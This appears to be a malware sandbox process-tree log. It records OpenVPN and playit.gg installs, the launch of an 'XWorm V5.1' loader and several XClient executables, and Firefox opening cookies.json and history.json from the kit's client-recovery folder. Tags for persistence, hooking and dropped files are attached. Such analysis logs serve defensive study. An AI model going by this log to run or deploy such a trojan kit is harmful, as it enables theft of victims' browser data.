C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=4452,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5364 /prefetch:12⤵PID:1648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4432,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5020 /prefetch:82⤵PID:5824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7232,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6176 /prefetch:82⤵PID:7116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=4572,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4328 /prefetch:12⤵PID:5900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7412,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7436 /prefetch:82⤵PID:5788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6236,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7528 /prefetch:82⤵PID:5948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=6984,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5060 /prefetch:12⤵PID:3508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=4448,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6116 /prefetch:12⤵PID:3200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7216,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7836 /prefetch:82⤵PID:3328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3536,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4920 /prefetch:82⤵PID:5172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=8672,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7292 /prefetch:12⤵PID:6672
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3580
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 25B3A6D057D42B8C8474CB22AC299F10 C2⤵
- Loads dropped DLL
PID:4592 -
C:\Program Files\OpenVPN\bin\openvpn-gui.exe"C:\Program Files\OpenVPN\bin\openvpn-gui.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5184 -
C:\Program Files\OpenVPN\bin\openvpn.exeopenvpn --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6004
-
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:5524
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding EE372FC70CEF78401C75C488875D9F342⤵
- Loads dropped DLL
PID:5652
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 75A31FD296E539B82FD83FB4FC163DB2 E Global\MSI00002⤵
- Boot or Logon Autostart Execution: Active Setup
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:4996 -
C:\Windows\System32\netsh.exenetsh interface set interface name="Local Area Connection" newname="OpenVPN Wintun"3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:6116
-
-
C:\Windows\System32\netsh.exenetsh interface set interface name="Local Area Connection" newname="OpenVPN TAP-Windows6"3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2816
-
-
C:\Windows\System32\netsh.exenetsh interface set interface name="Local Area Connection" newname="OpenVPN Data Channel Offload"3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5932
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config OpenVPNService start= auto3⤵
- Launches sc.exe
PID:5464
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" start OpenVPNService3⤵
- Launches sc.exe
PID:5156
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5564 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "1" "C:\Windows\Temp\4a6d2b123dc6bd94c00543024ef7a9b7507bf5ef6656d2a8b96424d1e430b9b7\wintun.inf" "9" "431e5e91f" "0000000000000130" "WinSta0\Default" "0000000000000168" "208" "C:\Windows\Temp\4a6d2b123dc6bd94c00543024ef7a9b7507bf5ef6656d2a8b96424d1e430b9b7"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5888
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "1" "C:\Windows\Temp\78b707b3cbfd14c482c290b636e9b49c94ed589bc2b246d622f50ab5c4ba6b08\OemVista.inf" "9" "4ed2a8887" "000000000000016C" "WinSta0\Default" "0000000000000164" "208" "C:\Windows\Temp\78b707b3cbfd14c482c290b636e9b49c94ed589bc2b246d622f50ab5c4ba6b08"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5348
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "1" "C:\Program Files\Common Files\ovpn-dco\Win11\ovpn-dco.inf" "9" "4e746adf3" "0000000000000164" "WinSta0\Default" "0000000000000178" "208" "C:\Program Files\Common Files\ovpn-dco\Win11"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5940
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "11" "ROOT\NET\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:9ef34515d755ec66:Wintun.Install:0.8.0.0:wintun," "42b53aaff" "0000000000000164" "3740"2⤵
- Drops file in Drivers directory
- Checks SCSI registry key(s)
PID:5992
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "11" "ROOT\NET\0001" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.27.0.0:root\tap0901," "433338203" "0000000000000160" "3740"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5292
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "11" "ROOT\NET\0002" "C:\Windows\INF\oem5.inf" "oem5.inf:c695c3de07ba2b5d:ovpn-dco_Device:1.2.1.0:ovpn-dco," "43b135903" "000000000000017C" "3740"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:1148
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵
- Modifies data under HKEY_USERS
PID:5552
-
C:\Program Files\OpenVPN\bin\openvpnserv.exe"C:\Program Files\OpenVPN\bin\openvpnserv.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2404 -
C:\Program Files\OpenVPN\bin\openvpn.exeopenvpn --log "C:\Users\Admin\OpenVPN\log\sadsadsd.first.log" --config "sadsadsd.first.ovpn" --setenv IV_GUI_VER "OpenVPN GUI 11.51.0.0" --setenv IV_SSO openurl,webauth,crtext --service 14400000028c 0 --auth-retry interact --management 127.0.0.1 25340 stdin --management-query-passwords --management-hold --pull-filter ignore route-method --msg-channel 5082⤵
- Executes dropped EXE
- Loads dropped DLL
PID:564
-
-
C:\Program Files\OpenVPN\bin\openvpnserv2.exe"C:\Program Files\OpenVPN\bin\openvpnserv2.exe"1⤵
- Executes dropped EXE
PID:4380
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3612,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:141⤵PID:5292
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5080,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:141⤵PID:2728
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4892,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:141⤵PID:5824
-
C:\Program Files\playit_gg\bin\playit.exe"C:\Program Files\playit_gg\bin\playit.exe"1⤵
- Executes dropped EXE
PID:1036
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4464,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:141⤵PID:5024
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:704
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004A8 0x00000000000004B81⤵PID:5128
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4840
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\XWorm v5.1-5.2\" -ad -an -ai#7zMap15033:88:7zEvent313551⤵PID:2084
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4012,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:141⤵PID:2796
-
C:\Users\Admin\Desktop\XWorm V5.1\XWormLoader 5.1 x64.exe"C:\Users\Admin\Desktop\XWorm V5.1\XWormLoader 5.1 x64.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5624 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xvm0jy4j\xvm0jy4j.cmdline"2⤵PID:5964
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE84.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc22CD627A9BCD4800A055AE1D13F1747.TMP"3⤵PID:2520
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ya3figcy\ya3figcy.cmdline"2⤵PID:5060
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B76.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc37F1C5293B914C9B95134DC26FCB3872.TMP"3⤵PID:5596
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lpyjttzq\lpyjttzq.cmdline"2⤵PID:4752
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE62.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC0840FA763FA46F69D298D68A5DF8855.TMP"3⤵PID:796
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v2md4j1n\v2md4j1n.cmdline"2⤵PID:6936
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES986A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc18BDD831829E4118ADD7A1673AD62C56.TMP"3⤵PID:6464
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oyyxk1a4\oyyxk1a4.cmdline"2⤵PID:2848
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D0F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc20199102601D4572A19627137975931A.TMP"3⤵PID:1052
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:1388
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=3784,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=2908 /prefetch:141⤵PID:4924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2252,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=4008 /prefetch:141⤵PID:3916
-
C:\Users\Admin\Desktop\XClient.exe"C:\Users\Admin\Desktop\XClient.exe"1⤵
- Executes dropped EXE
PID:2312
-
C:\Users\Admin\Desktop\XClient.exe"C:\Users\Admin\Desktop\XClient.exe"1⤵
- Executes dropped EXE
PID:5688
-
C:\Users\Admin\Desktop\XClient2.exe"C:\Users\Admin\Desktop\XClient2.exe"1⤵
- Executes dropped EXE
PID:4232
-
C:\Users\Admin\Desktop\XClient3.exe"C:\Users\Admin\Desktop\XClient3.exe"1⤵
- Executes dropped EXE
PID:5696 -
C:\Users\Admin\AppData\Local\Temp\qwadvk.exe"C:\Users\Admin\AppData\Local\Temp\qwadvk.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3576 -
C:\Windows\Temp\{2C9AE2B9-FF99-4231-9B2D-0172C2B8353B}\.cr\qwadvk.exe"C:\Windows\Temp\{2C9AE2B9-FF99-4231-9B2D-0172C2B8353B}\.cr\qwadvk.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\qwadvk.exe" -burn.filehandle.attached=752 -burn.filehandle.self=7603⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5488
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hktltxgx\hktltxgx.cmdline"2⤵PID:1672
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD258.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDCD210039DDD41509D5E73FC941EE055.TMP"3⤵PID:2352
-
-
-
C:\Program Files\playit_gg\bin\playit.exe"C:\Program Files\playit_gg\bin\playit.exe"1⤵
- Executes dropped EXE
PID:6100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1560,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=4392 /prefetch:141⤵PID:4384
-
C:\Windows\System32\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:4536
-
C:\Users\Admin\Desktop\XClient3.exe"C:\Users\Admin\Desktop\XClient3.exe"1⤵
- Executes dropped EXE
PID:6108
-
C:\Windows\System32\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1128 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\XWorm V5.1\ClientsFolder\9A78ACA14CB1BEF2667A\Recovery\RecoveryData\cookies.json"2⤵PID:6076
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\XWorm V5.1\ClientsFolder\9A78ACA14CB1BEF2667A\Recovery\RecoveryData\cookies.json"3⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:3748 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1852 -prefMapHandle 1848 -prefsLen 27419 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26222031-b01e-4325-8e60-93a07a4cb7d1} 3748 "\\.\pipe\gecko-crash-server-pipe.3748" gpu4⤵PID:5772
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2384 -prefMapHandle 2380 -prefsLen 28339 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75d441fc-42e0-4d5e-a0b4-a782d476e79b} 3748 "\\.\pipe\gecko-crash-server-pipe.3748" socket4⤵
- Checks processor information in registry
PID:5520
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1608 -childID 1 -isForBrowser -prefsHandle 3040 -prefMapHandle 3120 -prefsLen 28480 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ff8ceda-2d9d-4bb2-889c-d6e7bdded54f} 3748 "\\.\pipe\gecko-crash-server-pipe.3748" tab4⤵PID:6256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3616 -childID 2 -isForBrowser -prefsHandle 3724 -prefMapHandle 3720 -prefsLen 32829 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee15f693-5843-4131-8e0d-afc01637b269} 3748 "\\.\pipe\gecko-crash-server-pipe.3748" tab4⤵PID:6444
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2548 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4508 -prefMapHandle 4504 -prefsLen 32829 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64caf507-418e-4181-9a15-eea4ce241e30} 3748 "\\.\pipe\gecko-crash-server-pipe.3748" utility4⤵
- Checks processor information in registry
PID:6176
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1332 -childID 3 -isForBrowser -prefsHandle 4456 -prefMapHandle 3892 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3908cc4b-dbd9-4f62-8953-861b532d0014} 3748 "\\.\pipe\gecko-crash-server-pipe.3748" tab4⤵PID:2656
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 4 -isForBrowser -prefsHandle 5552 -prefMapHandle 5548 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {542c2667-42bc-4ab2-b20b-1dab9d93e252} 3748 "\\.\pipe\gecko-crash-server-pipe.3748" tab4⤵PID:6360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 5 -isForBrowser -prefsHandle 5744 -prefMapHandle 5740 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {714edf44-b6b5-4870-a8ad-b0220834e4ac} 3748 "\\.\pipe\gecko-crash-server-pipe.3748" tab4⤵PID:6396
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\XWorm V5.1\ClientsFolder\9A78ACA14CB1BEF2667A\Recovery\RecoveryData\history.json"1⤵PID:6772
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\XWorm V5.1\ClientsFolder\9A78ACA14CB1BEF2667A\Recovery\RecoveryData\history.json"2⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:7136 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27202 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e386b0f6-844e-4308-b84d-f489ebb82aba} 7136 "\\.\pipe\gecko-crash-server-pipe.7136" gpu3⤵PID:3156
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 28122 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d8e3597-7fb3-4140-a034-7c87495e427f} 7136 "\\.\pipe\gecko-crash-server-pipe.7136" socket3⤵
- Checks processor information in registry
PID:6648
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2652 -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 3024 -prefsLen 28263 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {857e35a5-c546-4677-9bf7-b1509b7f10c9} 7136 "\\.\pipe\gecko-crash-server-pipe.7136" tab3⤵PID:6472
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3576 -childID 2 -isForBrowser -prefsHandle 3568 -prefMapHandle 3536 -prefsLen 32612 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3e9b70b-0454-4aef-a50a-39f76587bb75} 7136 "\\.\pipe\gecko-crash-server-pipe.7136" tab3⤵PID:6820
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4240 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4224 -prefMapHandle 4172 -prefsLen 32612 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9fe830d0-2b3d-420e-87ad-3f5759a290d8} 7136 "\\.\pipe\gecko-crash-server-pipe.7136" utility3⤵
- Checks processor information in registry
PID:1812
-
-
